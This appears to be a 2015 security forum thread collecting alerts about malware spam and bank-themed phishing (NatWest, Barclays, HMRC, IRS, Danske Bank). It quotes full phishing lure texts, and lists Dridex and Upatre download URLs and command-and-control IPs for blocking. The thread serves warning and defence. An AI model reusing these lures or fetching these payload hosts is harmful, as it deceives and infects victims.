Please complete Bankline Banking Form :
- Your Customer Id and User Id - which are available from your administrator if you have not already received them
Additionally, if you wish to access Bankline training, simply follow the link below
<URL redacted>
If you have any queries or concerns, please telephone your Electronic Banking Help Desk.
National Westminster Bank Plc, Registered in England No. 929027. Registered Office: 135 Bishopsgate, London EC2M 3UR.
Authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority...
In this case the link in the email goes to www .ipawclp .com/NEW-IMPORTANT-NATWEST_FORM/new.bankline_document .html where it hits a couple of scripts at:
http ://restaurantratiobeach .ro/js/jquery-1.39.15.js
http ://utokatalin .ro/js/jquery-1.39.15.js
In turn, that leads to a ZIP file download which contains an EXE file which is slightly different each time it downloads, with low detection rates in all cases [1] [2] [3]. The name of the ZIP file and EXE varies, but is in the format doc12345.exe and doc54321.zip. Of note is a sort-of-informational screen on the download page:
> https://2.bp.blogspot.com/-BbZFLI01zzE/VL0eAGDsU8I/AAAAAAAAGIQ/MlAa94-Kmlc/s1600/fake-natwest.png
Automated analysis is presently inconclusive...
UPDATE:
@snxperxero suggests blocking the following sites:
202.153.35.133
loveshopclothing .com
credit490 .com "
1] https://www.virustotal.com/en/file/22599e7a2aa4c5d047fe075a7dec1e8aba4945dc08b79137571175d1703b0d70/analysis/1421678510/
2] https://www.virustotal.com/en/file/c955cefd43d594af4f36a5442878498e446ac80d63810b5052e852ea46a99d57/analysis/1421678516/
3] https://www.virustotal.com/en/file/76c76752649a6241f28d3134df5069c58296d3888a9bac17c6b4ccec843658fb/analysis/1421678522/
___
Fake 'Insurance Inspection' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html
19 Jan 2015 - "This spam does -not- come from FMG Support Group Ltd, but instead it is a forgery. FMG are -not- sending out the spam, nor have their systems been compromised in any way. Instead, this spam has a malicious Word document attached.
From: repairermessages@ fmg .co.uk
Date: 19 January 2015 at 07:24
Subject: Insurance Inspection Arranged AIG02377973
FMG is committed to reducing its impact on the environment. Please don't print this email unless absolutely necessary.
Have you been impressed by one of our people?
If so, we'd love to hear about it. You can nominate someone for a Spirit award by emailing spirit@ fmg .co.uk
FMG Support Group Ltd. Registered in England. No. 06489429.
Registered office: FMG House, St Andrews Road, Huddersfield, HD1 6NA.
Tel: 0844 243 8888 ...
Attached is a Word document AIG02377973-InsuranceInspectionArranged.doc which comes in at least -two- different versions, neither of which are detected by AV vendors [1] [2]. These documents contain -two- slightly different malicious macros... which attempt to download a further component from:
http ://chilan .ca/js/bin.exe
http ://techno-kar .ru/js/bin.exe
This is saved as %TEMP%\324234234.exe which has a VirusTotal detection rate of 2/57*. The Malwr report shows it attempting to communicate with the following IPs:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These two IP addresses have been used by this -malware- for a long time, I strongly recommend you block them. Also, a malicious DLL is dropped on the infected system with a detection rate of just 2/53**."
1] https://www.virustotal.com/en/file/2ba965fec6d3f369b617ec192376feb53673577af88fb218dd15dc33069384bb/analysis/1421656771/
2] https://www.virustotal.com/en/file/5afe6253b435668f7fb449bd75a53532f9237e738f4bbc83c511bdbd4df81fab/analysis/1421657737/
___
Fake '19TH JANUARY 2015.doc' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-traci-wilson.html
19 Jan 2015 - "This rather terse spam does -not- actually come from Davies Crane Hire, but it is a -forgery- with a malicious Word document attached. Davies Crane Hire have not been hacked or compromised, and they are -not- sending out this spam.
From: Traci Wilson [t.wilson@ daviescranehire .co.uk]
Date: 19 January 2015 at 09:05
Subject: 19TH JANUARY 2015.doc
There is -no- body text, just an attachment called 19TH JANUARY 2015.doc which contains a malicious macro.
The documents in use and the payload are identical to this spam run* that proceeded it. At the moment, everything has a very low detection rate. The payload is the Dridex banking trojan."
* http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html
- http://myonlinesecurity.co.uk/traci-wilson-daviescranehire-co-uk-19th-january-2015-xlsx-word-doc-malware/
19 Jan 2015
___
Fake 'tax refund' Phish...
- http://myonlinesecurity.co.uk/hm-revenue-customs-received-tax-refund-payment-phishing/
19 Jan 2015 - "'HM Revenue and Customs – You have received a tax refund payment !' is an email pretending to come from HM Revenue & Customs <tax@ hmrc .gov .uk> . One of the major common subjects in a phishing attempt is -Tax returns- where especially in the UK, you need to submit your Tax Return online before 31st December each year. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... If you follow the link you see a webpage looking like this where they want your email address and name:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish1.png
They then pretend to do a search based on your name and email. Then you get sent on to the nitty gritty where they want -all- your banking and credit information:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish2.png
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
:fear: :mad:
AplusWebMaster
2015-01-20, 14:43
FYI...
Fake 'Proforma Invoice' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html
20 Jan 2015 - "This -fake- invoice leads to malware. It is not being sent by Big K Products UK Ltd, their systems have not been hacked or compromised. Instead, the email is a -forgery- designed to get you to click the malicious attachment.
From: Monika [monika.goetz@ bigk .co.uk]
Date: 20 January 2015 at 07:18
Subject: Proforma Invoice
Please find enclosed the proforma invoice for your order. Please let me know when payment has been made, so that the goods can be despatched.
Kind regards,
Monika Goetz
Sales & Marketing Co-ordinator
The document attached is Proforma.doc which is currently undetected by AV vendors. It contains a malicious macro... which attempts to download a binary from:
http ://solutronixfze .com/js/bin.exe
..which is saved to %TEMP%\324234234.exe. This has a VirusTotal detection rate of 2/56* and the Malwr report shows it attempting to phone home to:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These IPs have been used many times in similar recent attacks an I recommend you block them. It also drops a DLL with a VirusTotal detection rate of 2/57**. The payload appears to be the Dridex banking trojan. See also this post*** about a related spam run also in progress this morning."
* https://www.virustotal.com/en/file/0dd553a3e401941a044412406dee6c83fc193bb5c5d19140c61a11aa0e346503/analysis/1421744001/
** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421744963/
*** http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html
- http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/
20 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Big-K-proforma-invoice.png
> https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/
___
Fake 'Barclays Online Bank [security-update]' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-barclays-important-update.html
20 Jan 2015 - "This -fake- Barclays spam leads to malware.
From: Barclays Online Bank [security-update@ barclays .com]
Date: 20 January 2015 at 14:41
Subject: Barclays - Important Update, read carefully!
Dear Customer,
Protecting the privacy of your online banking access and personal information are our primary concern.
During the last complains because of online fraud we were forced to upgrade our security measures.
We believe that Invention of security measures is the best way to beat online fraud.
Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.
For security reasons we downloaded the Update Form to security Barclays webserver.
You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.
- Please download and complete the form with the requested details: <URL redacted>
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)
Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.
Thank you for your patience as we work together to protect your account.
Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.
Sincerely,
Barclays Online Bank Customer Service
We apologize for any inconvenience this may have caused...
The link in the email varies, some other examples seen are:
http ://nrjchat .org/ONLINE~IMPORTANT-UPDATE/last-update.html
http ://utokatalin .ro/ONLINE-BANKING_IMPORTANT/update.html
http ://cab .gov .ph/ONLINE-IMPORTANT~UPDATE/last~update.html
Visiting these sites goes through some javascript hoops, and then leads to a ZIP file download which contains a malicious EXE that changes every time it is downloaded. The files are named in the general format update12345.zip and update54321.exe.
The file itself is an Upatre downloader, with poor detection rates [1] [2] [3].
The Malwr report shows traffic to the following URLs:
http ://202.153.35.133 :33384/2001uk11/HOME/0/51-SP3/0/
http ://202.153.35.133 :33384/2001uk11/HOME/1/0/0/
http ://clicherfort .com/mandoc/eula012.pdf
http ://202.153.35.133 :33387/2001uk11/HOME/41/7/4/
http ://essextwp .org/mandoc/ml1from1.tar
Out of these 202.153.35.133 (Excell Media Pvt Ltd, India) is one you should definitely block. This downloader drops several files including (in this case) %TEMP%\sJFcN24.exe which has a VirusTotal detection rate of just 3/57* and is identified as Dyreza.C by Norman anti-virus."
1] https://www.virustotal.com/en/file/dc887426e0b4c62b8c33fe9b7e549a0b86a54a44c65088ac8726755259962571/analysis/1421768747/
2] https://www.virustotal.com/en/file/e08439b97ceba3e38852ed22df7b402837305b3f973cd134f8d1d90a6a8d4377/analysis/1421768757/
3] https://www.virustotal.com/en/file/0c0e38af5c842905e74fc361ee6c33e0a3a3ebdd3d342f8acb601e0c21c89349/analysis/1421768766/
* https://www.virustotal.com/en/file/ebf8570dfc744a3a1b14cc2b04f2cd2c4c5271403a42bdd77b8b743be27d89c4/analysis/1421770305/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
- http://myonlinesecurity.co.uk/barclays-important-update-read-carefully-fake-pdf-malware-2/
20 Jan 2015
* https://www.virustotal.com/en/file/ad7a94f2091cee47b6406f4e1db03c57b537fab9707551f27e2b6cf541faf6ca/analysis/1421769761/
- http://threattrack.tumblr.com/post/108646232563/barclays-important-update-spam
Jan 20, 2015
Tagged: Barclays, Upatre
___
Fake 'Delivery Confirmation' SPAM – doc malware
- http://myonlinesecurity.co.uk/mereway-kitchens-delivery-confirmation-word-doc-malware/
20 Jan 2015 - "'mereway kitchens Delivery Confirmation' pretending to come from mereway kitchens <sales.north@ mereway .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... 2 versions of this spreading today. In one version once again the body of the email is completely -blank- ... and the malware is the same as today’s version of Proforma Invoice Monika big K – Word doc malware*. The second version also having the same malware just simply says 'Delivery Confirmation'..."
* http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/
- http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html
20 Jan 2015
1] https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/1421745692/
2] https://www.virustotal.com/en/file/f76bdf44089a2f81115e5f6b933b1c9966b7fb358b80c0cf532a72acf9fe46d0/analysis/1421746148/
___
Fake 'Undefined transactions' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-undefined-transactions.html
20 Jan 2015 - "This spam comes in a few different variants, however the body text always seems to be the same:
From: Joyce Mills
Date: 20 January 2015 at 10:30
Subject: Undefined transactions (need assistance) Ref:1647827ZM
Good morning
I have recently found several payments on statement with the incorrect reference. Amounts appear to be from your company, could you please confirm these payments are yours and were made from your company's bank account. If no then please reply me as soon as possible. Thanks.
P.S. Undefined transactions are included in the attached DOC.
Regards,
Joyce Mills
Senior Accounts Payable
PAYPOINT
The reference number is randomly generated and changes in each case, attached is a malicious Word document also containing the same reference number (e.g. 1647827ZM.doc). Also the name in the "From" field is consistent with the name on the bottom of the email, although this too seems randomly generated... I have seen two different variants of Word document in circulation, both undetected by AV vendors [1] [2] and each one contains a slightly different malicious macro... which attempt to download from the following locations:
http ://189.79.63.16 :8080/koh/mui.php
http ://203.155.18.87 :8080/koh/mui.php
This file is downloaded as 20.exe and is then copied to %TEMP%\324234234.exe. It has a VirusTotal detection rate of 2/57*. That report indicates that it attempts to phone home to:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP is commonly used in this type of attack, I would strongly recommend you block it. The Malwr report shows that this drops a Dridex DLL with a VirusTotal detection rate of 2/57**, which is the same DLL as seen earlier today***."
1] https://www.virustotal.com/en/file/5d2500d1e1776adffe161bae934af1e52389d6134a3d14ce8d638fb6d6185fd2/analysis/1421750540/
2] https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421750559/
* https://www.virustotal.com/en/file/b6d46cfd60db1e9edef1077d908f075f3dc4ca2b0161f40ca02e0b50d468809a/analysis/1421750847/
** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421752892/
*** http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html
- http://myonlinesecurity.co.uk/undefined-transactions-need-assistance-ref50236lv-word-doc-malware/
20 Jan 2015
* https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421749886/
___
Fake 'IRS' SPAM - doc malware
- http://myonlinesecurity.co.uk/internal-revenue-service-complaint-company-word-doc-malware/
20 Jan 2015 - "'Complaint against your company' pretending to come from Internal Revenue Service <complaints@irs.gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear business owner,
A criminal complaint has been filled against your company.
Your company is being accused of trying to commit tax evasion schemes.
The full text of the complaint file ( .DOC type ) can be viewed in your
Microsoft Word, complaint is attached.
AN official response from your part is required, in order to take further
action.
Please review the charges brought forward in the complaint file, and
contact us as soon as possible by :
Telephone Assistance for Businesses: Toll-Free, 1-800-829-4933
Email: complaints@ irs .gov
Thank you,
Internal Revenue Service Fraud Prevention Department
20 January 2015 : complaint20150119.doc - Current Virus total detections: 22/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d04079c569863276bf4a135096b68fbafc6bb2679ac10b41b4af40f30d6fbb12/analysis/1421772306/
___
Fake 'Bank of Canada' SPAM – PDF malware
- http://myonlinesecurity.co.uk/national-bank-canada-notice-payment-fake-pdf-malware/
20 Jan 2015 - "'National Bank of Canada Notice of payment pretending to come from sac.sbi@ sibn .bnc .ca with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You can view and print the notice of payment using the Netscape or
Microsoft Explorer browsers, versions 6.2 and 5.5. You can export and store the
notice of payment data in your spreadsheet by choosing the attached file in
pdf format “.pdf”.
If you have received this document by mistake, please advise us immediately
and return it to us at the following E-mail address:
“sac.sbi@ sibn .bnc .ca”.
Thank you.
National Bank of Canada
600 de La Gauchetire West, 13th Floor
Montreal, Quebec H3B 4L2 ...
20 January 2015: payment_notice.zip: Extracts to: payment_notice.scr
Current Virus total detections: 13/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1c6bf03d178cc1c5dd101e3bcd5fdf8f56bd2c1e8217e3713ffe6a861b1d33b6/analysis/1421783533/
:fear: :mad:
AplusWebMaster
2015-01-21, 15:23
FYI...
Fake 'Open24 Service update' Phish ...
- http://myonlinesecurity.co.uk/open24-permanent-tsb-service-update-phishing/
21 Jan 2015 - "'Open24 Permanent TSB Service update' pretending to come from Open24 <serviceupdates@ gol .net .gy> is one of the latest -phish- attempts to steal your Open24.ie ( Permanent TSB) Bank, credit card and personal details. This one only wants your personal details, your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email:
Fwd: Software Upgrade
Dear Open24 Customer,
In order to help us protect our main line of defense against intruders; you will need to update your account through our secured server, in line to safe internet banking regulatory Requirements.
To proceed, simply follow the link below:
service_update
Kind regards
Open24
> Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish1.png
When you fill in your user name and password you get sent on to a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format then you are sent to the genuine open24.ie ( permanent TSB ) bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish2-1024x659.png
All of these emails use Social engineering tricks to persuade you to open the attachments (or click-the-link) that come with the email..."
___
Fake inTuit QuickBooks Phish
- https://security.intuit.com/alert.php?a=119
1/19/2015 - "People are receiving -fake- emails with the title "Profile Update". These mails are coming from turbotax_infoo01@ grr .la, which is -not- a legitimate email address. Below is a copy of the email people are receiving:
> https://security.intuit.com/images/profileupdatephish.jpg
This is the end of the -fake- email.
Steps to Take Now:
- Do -not- open the attachment in the email...
- Do not forward the email to anyone else.
- Delete the email."
___
Flash 0-Day Exploit used by Angler Exploit Kit
- https://isc.sans.edu/diary.html?storyid=19213
2015-01-21 - "The "Angler" exploit kit is a tool frequently used in drive-by download attacks to probe the browser for different vulnerabilities, and then exploit them to install malware. The exploit kit is very flexible and new exploits are added to it constantly. However, the blog post below* shows how this exploit kit is currently using an unpatched Flash 0-day to install malware. Current versions of Windows (e.g. Window 8 + IE 10) appear to be vulnerable. Windows 8.1, or Google Chrome do not appear to be vulnerable... typically we see these exploits more in targeted attacks, not in widely used exploit kits. This flaw could affect a large number of users very quickly..."
* http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
2015-01-21 - "... Angler EK exploiting last version (16.0.0.257) of Flash..."
Update: "... tested it against the free version of Malwarebytes Anti Exploit* (a product from one of my customers). That stopped it. Well done!..."
* https://www.malwarebytes.org/antiexploit/
- http://blog.trendmicro.com/trendlabs-security-intelligence/flash-greets-2015-with-new-zero-day/
Jan 22, 2015 - "... Chrome’s version of the Flash Player plugin is sandboxed, mitigating potential effects to end users. Firefox is also immune to this threat..."
Geographic distribution of users affected by Angler
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Geographic-Distribution-of-Users-Affected-by-Angler-01.jpg
:fear: :mad:
AplusWebMaster
2015-01-22, 16:12
FYI...
Fake 'HMRC Application' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware-2/
22 Jan 2015 - "'HMRC Application – [ your domain name]' pretending to come from HMRC .gov .uk <application@ hmrc .gov .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This template was used in a malware run back in July 2014 and gets periodically reused HMRC Application – fake PDF malware*...
* http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware/
The email looks like:
Please print this information, sign and send to application@ hmrc .gov .uk.
Date Created: 22 January 2015
Business name: ...
Acknowledgement reference: 3213476
VAT Registration Number is 3213476.
Repayment of Input Tax
Before the business starts to make taxable supplies they may provisionally claim repayment of VAT they are charged as input tax. The general rules about VAT, including Input Tax, Partial Exemption, are explained in VAT Notices 700 and 706, available on the HMRC website
Repayment of VAT as input tax is subject to the condition, provided for by the Value Added Tax Act 1994, Section 25(6), that HMRC may require them to refund some or all of the input tax they have claimed, if they do not make taxable supplies by way of business, or the input tax they claimed prior to a period in which they make taxable supplies in the course of business does not relate to the taxable supplies they make.
Change of Circumstances
If your client no longer intends to make taxable supplies, or there is any other change of circumstances affecting their VAT registration (including any delay in starting to make taxable supplies), they must notify HMRC within 30 days of the change.
If the application included an enquiry about:
the Flat Rate Scheme
the Annual Accounting Scheme
an Economic Operator Registration and Identification (EORI) number
HMRC will send your client more information about this separately
What next?
Your client will receive their Certificate of Registration (VAT4) in the post in due course.
Your client can find general information about VAT and a guide to record keeping requirements by following one of the links below...
22 January 2015: Application_3213476.zip (15 kb): Extracts to: Application_891724.pdf.exe
Current Virus total detections: 2/56** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
** https://www.virustotal.com/en/file/a38511049249886b981a5a6221008a867e5199b5961106a3cec29badd523dd94/analysis/1421924288/
___
Fake 'Tesco Bank Fix' – Phish ...
- http://myonlinesecurity.co.uk/tesco-bank-fix-error-account-phishing/
22 Jan 2015 - "'Tesco Bank Fix The Error On Your Account' pretending to come from Tesco .com <info@ thf .com> warning of errors on your account is one of the latest phish attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html ( webpage) form that comes attached to the email:
Dear Customer:
You have an incoming payment slated for your account. This transaction cannot be
completed due to errors present in your account information.
You are required to click on the Logon below to fix this problem immediately.
LOG ON
Please do not reply to this message. For questions, please call Customer Service at the
number on the back of your card. We are available 24 hours a day, 7 days a week.
Regards,
Tesco Personal Finance.
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake (more) MyFax malware SPAM
- http://blog.dynamoo.com/2015/01/yet-more-myfax-malware-spam.html
22 Jan 2015 - "There's another batch of "MyFax" spam going around at the moment, for example:
From: MyFax [no-replay@ my-fax .com]
Date: 22 January 2015 at 15:08
Subject: Fax #4356342
Fax message
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
Sent date: Thu, 22 Jan 2015 15:08:30 +0000
Clicking the link [don't] leads to a page like this:
> http://1.bp.blogspot.com/-k2m-UrYJxyA/VMEkOU_xYXI/AAAAAAAAGKc/POCVv8uPOwg/s1600/upatre.png
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http ://202.153.35.133 :51025/2201us22/HOME/0/51-SP3/0/
http ://202.153.35.133 :51025/2201us22/HOME/1/0/0/
http ://when-to-change-oil .com/mandoc/story_su22.pdf
http ://202.153.35.133 :51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to -block- traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48*.
I haven't seen a huge number of these, the format of the URLs looks something like this:
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http ://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http ://[redacted]/_~NEW.FAX.MESSAGES/incoming.html "
1] https://www.virustotal.com/en/file/eaedc6884264fd9e5afd6ebc754bc7ad1ff6e5670e49536bcf5b949864515617/analysis/1421943275/
2] https://www.virustotal.com/en/file/ddaf8767671337047a98934b34c1f90f17078516887cbb4116355295ac670adb/analysis/1421943304/
3] https://www.virustotal.com/en/file/3d99b919a29563e3cf86e2577c85202127c3f4372538d0d3d0830f9199a39d32/analysis/1421943319/
* https://www.virustotal.com/en/file/7cea9e6d5c8a1484f3928ad2e946471799872e07ef70cb8ee0ea16d1ab502d40/analysis/1421944232/
- http://myonlinesecurity.co.uk/myfax-fax-5717718-fake-pdf-malware/
22 Jan 2015
* https://www.virustotal.com/en/file/b7ddbecb37df4b1aef2de5f8defaa44ad41ef534714310ab33a9ecc74e504681/analysis/1421940393/
___
Fake 'voice mail' SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-voice-mail-fake-pdf-malware/
22 Jan 2015 - "'You have received a voice mail' pretending to come from Voice Mail <no-reply@ voicemail-delivery .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE 837-676-8958.wav (29 KB)
Caller-Id: 837-676-8958
Message-Id: KIUB4Y
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
22 January 2015 : VOICE837-676-8958.zip (209 kb): Extracts to: VOICE8419-283-481.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e855d451a62df108cd81c8bc350d24c60cad32981db4d8df08937804be5ddde0/analysis/1421943742/
0003_.b64.zip-1.exe
:fear: :mad:
AplusWebMaster
2015-01-23, 15:17
FYI...
Fake 'tax return incorrect' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-2014-tax-payment-issue.html
23 Jan 2015 - "This tax-themed spam has a malicious Word document attached. It appears to come in several variants, for example:
From: Quinton
Date: 23 January 2015 at 08:18
Subject: 2014 Tax payment issue
According to your tax payments for 2014 year period we found that you gave a wrong legal address in your last tax payment. In order to avoid penalty fees on your tax dues we ask you to contact our specialist having checked the previous payment in advance (the DOC invoice attached below).
Regards
Quinton
Tax Inspector
From: Tara Morris
Date: 23 January 2015 at 09:28
Subject: Your tax return was incorrectly filled out
Attention: Accountant
This is to inform you that your legal address was filled incorrectly while completing the last tax form application for 2014 year.
In order to avoid penalty fees during the next tax period please contact our expert as soon as you check the payment details (the DOC invoice attached below).
Attached is a Word document with a random name, but always starting with "TAX_". Examples include:
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither are detected by AV vendors [1] [2] containing one of two malicious macros... that download a file 20.exe from the following URLs:
http ://37.139.47.221 :8080/koh/mui.php
http ://95.163.121.82 :8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending."
1] https://www.virustotal.com/en/file/5d93d9f0368d6b0ff5881864b7c9792bdde482f8b79d6ade44d6c878f58897c4/analysis/1422005666/
2] https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422005678/
37.139.47.221: https://www.virustotal.com/en/ip-address/37.139.47.221/information/
95.163.121.82: https://www.virustotal.com/en/ip-address/95.163.121.82/information/
- http://myonlinesecurity.co.uk/tax-return-incorrectly-filled-word-doc-malware/
23 Jan 2015
> https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422004558/
TAX_38156WHH.doc
> https://www.virustotal.com/en/file/3d1acc20c90088cf164863343dd3bca558a45bb0e386923e26b88ed571e991e8/analysis/1422007893/
23.01.15_3406ICZ.xls
___
Fake 'Danske Bank' SPAM – PDF malware
- http://myonlinesecurity.co.uk/danske-bank-potentially-fraudulent-transaction-fake-pdf-malware-2/
23 Jan 2015 - "'Danske Bank – Potentially fraudulent transaction' pretending to come from Dee Hicks – Danske Bank <Dee.Hicks@ danskebank .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We are contacting you regarding a potentially fraudulent transaction on your account.
Please check attached file for more information about this specific transaction.
Dee Hicks
Senior Account Executive
Danske Bank
Dee.Hicks@ danskebank .com
Tel. +45 33 44 46 77
CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed...
23 January 2015 : bank_notice2301.zip (12kb): Extracts to: bank_notice2301.scr
Current Virus total detections: 8/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d1d6bcb1e318abc7f8bb92d4eb3da9dd78843fa9bf456ceed0cf7bd666387104/analysis/1422012240/
___
Fake 'IRS Activity' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-irs-fiscal-activity-531065.html
23 Jan 2015 - "This fake IRS spam actually does use the irsuk .co domain to host malware.
From: IRS [support@ irsuk .co]
Date: 23 January 2015 at 11:46
Subject: IRS Fiscal Activity 531065
Hello, [redacted].
We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.
To install the program go to the link <redacted>
Thanks
Intrenal Revenue Sevrice...
